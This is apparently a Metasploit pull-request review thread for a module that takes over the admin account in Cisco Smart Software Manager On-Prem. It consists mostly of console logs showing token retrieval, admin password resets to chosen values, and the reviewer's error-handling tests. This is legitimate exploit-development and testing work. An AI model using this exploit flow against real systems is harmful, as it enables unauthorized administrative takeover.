[*] 192.168.217.202:8443 - The target is not exploitable.
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.217.200
RHOSTS => 192.168.217.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > check

[+] Server reachable.
[+] Retrieved XSRF Token: SpNSskAkiXrrJdW0a6Z0aGKvvTOEJ2UcfY5b6zm6mVWV9BeJGFjDmfiijiZCGU3SuPKTYD5kCaIm5hUj0iC/CA==
[+] Retrieved auth_token: 16a94bca4d992d92ffdf05053928d984ddd14a2fe12c879c9b22ea963033efa1
[*] 192.168.217.200:8443 - The target appears to be vulnerable.
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.217.200

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: fVQWZRQIyL6d/5APSNVPI00Ewv1LvzcukXdRtxwfdagLQ5SwluWwUtm8xygSL/E8VuWqiTIGjhGVyFBlWj3ucA==
[+] Retrieved auth_token: c8a51def35eaac024bc7cc540d89a9713ac9e2c6de5390d02c4725ce7c86a762
[+] The target appears to be vulnerable.
[+] Server reachable.
[+] Retrieved XSRF Token: 14XWEGgpYL48NTu8Wb8/o5jyw1NtCrBiUwqe4K1jN72hklTF6sQYUnh2bJsDRYG8gxOrJxSzCV1XtZ8y60GsZQ==
[+] Retrieved auth_token: 88d2cb42c52b391921fca228042b3eb96a801917cd7e2c114f9165fa22459c4c
[+] Password for the admin user was successfully updated: aklsdlkad232!ASDASDA
[+] Login at: https://192.168.217.200:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

[h4x-x0r]

@jheysel-r7 I've updated the module to remove the duplicate requests. Thanks again for your feedback.

[jheysel-r7]

Hey @h4x-x0r, thanks for making all of those changes. They look great.

One thing I forgot to mention. When the check method shares functionality with the run or exploit method like this you have to be careful to ensure that the check method is still always returning a CheckCode.

If one of the method's the called by the check method executes a fail_with the check method will not be able to return a CheckCode. To work around this issue we can define some custom errors, have the methods raise these errors and then handle those errors accordingly in both the check and run methods.

I've pushed this change along with a few other minor fixes in f254eeb.

Testing

Error handling testing

I hardcoded some values to induce and test the error handling:

Check method handling:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server. "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: l2G/NLWAcqMg1nO1tRDyeUJI5Il/stIvc+ljsYi3Fj1mEkkk3j1PgHzCjnZVeECvOV91IT1nCEVnRzyvnUGWhA==
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: 2jUjI/jPLdS8S2ktrVV6hKFthpHGm3JPSAAt2k4fO/fVFFzUDgui42iFW/ilya2ICVAf6SuKe53Cj4j2ytklvg==
[+] Retrieved auth_token: 12090a926c5ceccfb850b76f0b2fa273d8c2e9e9aaa5d56ebf2c6095d5880ae4
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

Run method error handling:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found
[*] Auxiliary module execution completed


msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: MZOn/v5A2HfHp6c5d0DlyXUVKWso+y0B1mEGvBrIzHVUe2vm3rhlzg6GxtHI02C5i+E7tRqXSq5gIC5VDcc37A==
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: HOti6Sne63dXErPIBkHwc5pEiXTMiQe/9UCNYvPUILOk0iesmWcuzunmf5tNM1nczCaNytGBvss9MdxvmFJupw==
[+] Retrieved auth_token: 60f4890d5bb36eab94c776b8f8e469506be1122a4e77ce4155f7dc214aa4f9d8
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password
[*] Auxiliary module execution completed

Testing was as expected on a vulnerable version:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: U4WTxHe4jHbgxH2TYLDyXqttSdPLET1MteWfS5nx7eTdbpmgue9rTTps1SVDawewbOk0ZWahrQXvB824sRDqCg==
[+] Retrieved auth_token: 806cc091a24b78f7bb9e19b4e28b641aecc6781aec101f4a0f16de9f6f3d2b06
[+] The target appears to be vulnerable.
[+] Password for the admin user was successfully updated: t9YKVWigDO2y1Tkc!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

AutoCheck set to false:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.50

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: 3SQKRCpHP9j2xSoY/471jNScqjeCsy24+mhlx5oXhmbzXGW5h/Ov3WEyVCwNVXO6iNgGUiiS9IcUNbrQTnOlWQ==
[+] Retrieved auth_token: 455cdc53c6a1336bba8a01049057ab420b2b6e3447093a7abd5b87de393bb9e7
[+] Password for the admin user was successfully updated: asdfasdfASDASDASD39!
[+] Login at: https://172.16.199.50:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

[jheysel-r7]

Before this check was added, if AutoCheck was set to false and the NEW_PASSWORD did not contain and upper case letter, the module would fail with a non-descriptive error message, because an error response has a response code of 200.

The module would continue, the response to backend/auth/identity/callback would also be a 200 and the error message would be:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: N8bloAwZoPRD4kPc3Vl0XNOps4Yideqk0ro75xul5Sohz2M1xjTp08KNB0H5D2mpp6/sFtckmmP1LvPddCbMHg==
[+] Retrieved auth_token: b1d17afaac83730edac30dd2242eafc0adc0da4ef9b505ba5d0682c220f75b6b
[-] Auxiliary aborted due to failure: unexpected-reply: The requested user is not found.
[*] Auxiliary module execution completed

Now this error message is displayed like so:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.50

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: amUaFSgVZhNwx5qSUdX4Qv5ZVh4nPk8jsTv2etORqHP6oHbOYqRgt7UNQ1lYETgu2sZzw8Ja30Rqp12a9UbmjQ==
[+] Retrieved auth_token: 791252bb6a863cc21967d30c11b1a599efda1a100d45f6d8685145f52c8087ed
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, There was an error resetting the password: Password should contain at least one uppercase and one lower case "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

[h4x-x0r]

@jheysel-r7 Thank you for all the reliability improvements and explanations.

[jheysel-r7]

Release Notes

This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206, by changing the password of the admin user to one that is attacker-controlled.